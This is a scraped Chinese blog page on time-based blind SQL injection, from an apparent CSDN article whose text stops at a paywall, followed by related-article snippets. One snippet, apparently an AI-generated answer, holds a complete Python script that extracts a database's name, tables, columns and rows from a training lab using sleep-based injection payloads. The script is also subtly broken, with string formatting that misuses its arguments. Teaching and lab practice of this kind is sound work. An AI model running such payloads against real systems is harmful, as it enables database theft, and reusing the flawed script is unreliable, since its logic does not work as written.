基于时间的盲注

最新推荐文章于 2024-05-21 14:11:46 发布
VIP文章 最新推荐文章于 2024-05-21 14:11:46 发布
阅读量180 收藏 2
点赞数
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/d59hao/article/details/131844952
版权

01 盲注简介

盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

02 盲注原理

盲注的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。

对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表达式,而这布尔表达式结果的真假,决定了每次页面有不同的反应。

对于基于时间的盲注来说,我们构造的语句中,包含了能否影响系统运行时间的函数,根据每次页面返回的时间,判断注入的语句是否被成功执行。

03 盲注分类

基于布尔SQL盲注

基于时间的SQL盲注

基于报错的SQL盲注

04 盲注的流程

找寻并确认sql盲注点

强制产生通用错误界面

注入带有副作用的查询

根据布尔表达式的真假结果,结合不同的返回结果确认注入是否成功

05 基于时间的盲注

(1)常用函数

If(exp,v1,v2):如果表达式 expr 成立,返回结果 v1;否则,返回结果 v2 ;Substring(s,n,len):获取从字符串 s 中的第 n 个位置开始长度为 len 的字符串;

Sleep࿰

最低0.47元/天 解锁文章
第59号实验室
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
时间盲注(延迟注入)
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
深入浅出带你学习时间盲注
bluemoon_0的博客
02-13 352
深入浅出带你学习时间盲注
SQL Injection (Blind)之盲注(原理、分类、利用)
weixin_51513059的博客
03-24 3182
在SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间盲注(Time based)
SQL注入-盲注(布尔盲注时间盲注
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
渗透测试——sql注入进阶/基于时间盲注/一看就会/
ChenD的学习笔记
10-06 1696
基于时间盲注
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
mysql-blind(高级盲注+基于布尔).docx
01-23
主要有三种,基于时间,布尔,错误[实际遇到的非常少]的盲注,不过我们今天暂时只针对布尔型盲注做详细说明,关于其它的技巧,后续还会再单独说明,其实,也算不上什么很高级的技巧,都是一些很基础的堆砌,废话不多说,最好的...
第九节 POST基于时间和布尔的盲注-01
09-15
第九节 POST基于时间和布尔的盲注-01
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
Blind_SPOT:盲点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入,代码注入,SSTI
05-30
盲点盲点是一个python工具,用于盲注漏洞,基于SQLi时间,命令注入,代码注入,SSTI要求 :- Python3 请求和 colorama 库用法 :- -u ===>目标网址在您的注入区域或参数中添加 [*] -p payload_list ,有 r zahir009 ...
浅谈盲注中的基于时间型和布尔型的注入方法
热门推荐
pygain的博客
11-08 2万+
SQL显错注入已经被用烂了像这种漏洞,漏洞批量发现工具找一找,sqlmap跑一跑。 今天讲的是在我们的命令被带入数据库查询语句但是却什么都没有返回的情况我们该怎么办。例如应用程序就会返回一个“通用的”的页面,或者重定向一个通用页面(可能为网站首页)。这时,我们之前学习的SQL注入办法就无法使用了。 盲注,即在SQL注入过程中,SQL语句执行选择后,选择的数据不能回显到前端,我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注
基于时间盲注原理简介
m0_38103658的博客
08-30 6340
基于时间盲注 盲注简介 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注盲注原理 盲注的本质就是猜解,在没有回显数据的情况下,我们只能靠‘感觉’来体会每次查询时一点点细微的差异,而这差异包括运行时间的差异和页面返回结果的差异。 对于基于布尔的盲注来说,我们可以构造一条注入语句来测试我们输入的布尔表...
SQL注入-基于时间盲注
qq_43691308的博客
04-06 866
SQL注入,mysql,时间盲注盲注
⑦基于时间型SQL盲注
熊俊坤的博客
11-06 7871
基于时间型SQL盲注
时间盲注
heibaikong6的博客
09-14 3801
文章目录简介步骤函数构建判断语句构建暴库语句实操 简介 时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。 步骤 设置时间延迟,正确的延迟,错误则不会延迟来进行猜测,得到正确的闭合 继续利用设置时间延迟,正确的延迟,错误则不会延迟来进行猜测各种数据 函数 length() 返...
Sql注入系列详解(一)---基于时间差的盲注
AI.PLAY
05-07 1万+
Sql 基于时间盲注   基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0. 例如: 于是sleep(N)这个语句在这种情况下起到了非常大的作用。  Select sleep(N)可以让此语句运行n秒钟。 但是如果查询语句的条件不存在,执行的时间便是0,利用该函数
前端基础入门三大核心之网络安全篇:TLS/SSL的魔法之旅
最新发布
一个做过前端开发的产品经理,经历过睿智产品的折磨导致脱发之后,励志要翻身"农奴"把歌唱,一边打入敌人内部一边持续提升自己,为我们广大开发同胞谋福祉,坚决抵制睿智产品折磨我们码农兄弟!
05-21 552
TLS/SSL,这个看似复杂的协议,实际上正默默地守护着我们每一次的在线交互。作为前端开发者,理解其工作原理并在日常开发中实践安全最佳实践,是我们每个人的职责。现在,当你再次看到地址栏那个绿色的小锁图标时,是不是觉得它更加亲切了呢?关于TLS/SSL,你还有哪些独到的见解或实战经历?欢迎在评论区留言,让我们共同探讨,携手营造一个更安全的网络环境。欢迎来到我的博客,很高兴能够在这里和您见面!希望您在这里可以感受到一份轻松愉快的氛围,不仅可以获得有趣的内容和知识,也可以畅所欲言、分享您的想法和见解。
能帮我写一个Python程序,基于sql-lab第九关的时间盲注,要能够获取数据库名,表名,列名和数据的。
06-06
当然可以帮你写一个基于时间盲注的Python程序,获取数据库名,表名,列名和数据。以下是示例代码: ```python import requests import string # 数据库名长度 db_name_length = 0 # 数据库名 db_name = '' # 表名列表 table_names = [] # 列名列表 column_names = [] # 数据列表 data_list = [] # SQL注入语句的前缀和后缀 sql_prefix = "1' and if((select ascii(substring(database(),{},1)))={},sleep(3),1)-- -" sql_suffix = '' # 发送请求的函数 def make_request(payload): url = "http://your-ip/sql-lab/my-query" data = { 'query': payload, 'submit': 'Submit Query' } headers = { 'Cookie': 'session=your-session-id' } response = requests.post(url, data=data, headers=headers) return response.elapsed.total_seconds() # 获取数据库名长度 for i in range(1, 100): payload = sql_prefix.format(i, 97) if make_request(payload) >= 3: db_name_length = i break # 获取数据库名 for i in range(1, db_name_length + 1): for j in string.printable: payload = sql_prefix.format(i, ord(j)) if make_request(payload) >= 3: db_name += j break # 获取表名列表 payload = "1' and if((select count(*) from information_schema.tables where table_schema='{}')={},sleep(3),1)-- -".format(db_name, 0) if make_request(payload) >= 3: table_count_payload = "1' and if((select count(*) from information_schema.tables where table_schema='{}')={},sleep(3),1)-- -".format(db_name, 1) table_count = 0 for i in range(1, 100): payload = table_count_payload.format(i) if make_request(payload) >= 3: table_count = i break for i in range(table_count): table_payload = "1' and if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema='{}' limit {},1)={},sleep(3),1)-- -".format(1, db_name, i, 0) table_name_length = 0 for j in range(1, 100): payload = table_payload.format(j) if make_request(payload) >= 3: table_name_length = j break table_name = '' for j in range(1, table_name_length + 1): for k in string.printable: payload = "1' and if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema='{}' limit {},1)={},sleep(3),1)-- -".format(j, db_name, i, ord(k)) if make_request(payload) >= 3: table_name += k break table_names.append(table_name) # 获取列名列表和数据列表 for table_name in table_names: column_payload = "1' and if((select count(*) from information_schema.columns where table_schema='{}' and table_name='{}')={},sleep(3),1)-- -".format(db_name, table_name, 0) if make_request(column_payload) >= 3: column_count_payload = "1' and if((select count(*) from information_schema.columns where table_schema='{}' and table_name='{}')={},sleep(3),1)-- -".format(db_name, table_name, 1) column_count = 0 for i in range(1, 100): payload = column_count_payload.format(i) if make_request(payload) >= 3: column_count = i break for i in range(column_count): column_payload = "1' and if((select ascii(substring(column_name,{},1)) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={},sleep(3),1)-- -".format(1, db_name, table_name, i, 0) column_name_length = 0 for j in range(1, 100): payload = column_payload.format(j) if make_request(payload) >= 3: column_name_length = j break column_name = '' for j in range(1, column_name_length + 1): for k in string.printable: payload = "1' and if((select ascii(substring(column_name,{},1)) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={},sleep(3),1)-- -".format(j, db_name, table_name, i, ord(k)) if make_request(payload) >= 3: column_name += k break column_names.append(column_name) data_payload = "1' and if((select count(*) from {})={},sleep(3),1)-- -".format(table_name, 0) if make_request(data_payload) >= 3: data_count_payload = "1' and if((select count(*) from {})={},sleep(3),1)-- -".format(table_name, 1) data_count = 0 for j in range(1, 100): payload = data_count_payload.format(j) if make_request(payload) >= 3: data_count = j break for j in range(data_count): data_item = {} for column_name in column_names: data_payload = "1' and if((select ascii(substring({},1)) from {} limit {},1)={},sleep(3),1)-- -".format(column_name, table_name, j, 0) data_length = 0 for k in range(1, 100): payload = data_payload.format(k) if make_request(payload) >= 3: data_length = k break data_value = '' for k in range(1, data_length + 1): for l in string.printable: payload = "1' and if((select ascii(substring({},{})) from {} limit {},1)={},sleep(3),1)-- -".format(column_name, k, table_name, j, ord(l)) if make_request(payload) >= 3: data_value += l break data_item[column_name] = data_value data_list.append(data_item) # 打印结果 print('Database name: {}'.format(db_name)) print('Table names: {}'.format(table_names)) print('Column names: {}'.format(column_names)) print('Data: {}'.format(data_list)) ``` 需要修改的地方: 1. 将 `your-ip` 替换成 sql-lab 的 IP 地址 2. 将 `your-session-id` 替换成你的 sql-lab 的 session ID 注意:这个程序只适用于 sql-lab 第九关的时间盲注。如果你要用于其他情况,请适当修改代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值